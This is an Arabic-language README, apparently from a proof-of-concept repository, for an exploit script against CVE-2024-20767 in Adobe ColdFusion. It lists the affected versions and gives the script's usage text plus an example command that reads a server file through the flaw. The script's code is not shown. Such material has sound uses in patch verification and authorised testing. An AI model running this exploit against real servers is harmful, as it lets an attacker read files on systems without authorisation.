
استغلال لـ CVE-2024-20767 - Adobe ColdFusion

المنتجات والإصدارات المتأثرة:
| المنتج | الإصدارات المتأثرة |
|---|---|
| ColdFusion 2023 | التحديث 6 والإصدارات الأقدم |
| ColdFusion 2021 | التحديث 12 والإصدارات الأقدم |
يمكنك نشر خادم ColdFusion باستخدام نسخة تجريبية مجانية من Adobe:
usage: CVE-2024-20767.py [-h] -t TARGET [-p PORT] -c COMMAND
options:
-h, --help show this help message and exit
-t TARGET, --target TARGET
عنوان URL لخادم Adobe ColdFusion الهدف
-p PORT, --port PORT منفذ خادم Adobe ColdFusion الهدف، افتراضياً نستخدم المنفذ 8500
-c COMMAND, --command COMMAND
مسار قراءة الملف
مثال:
python CVE-2024-20767.py -t http://192.168.124.203 -p 8500 -c Windows/ServerStandardEval.xml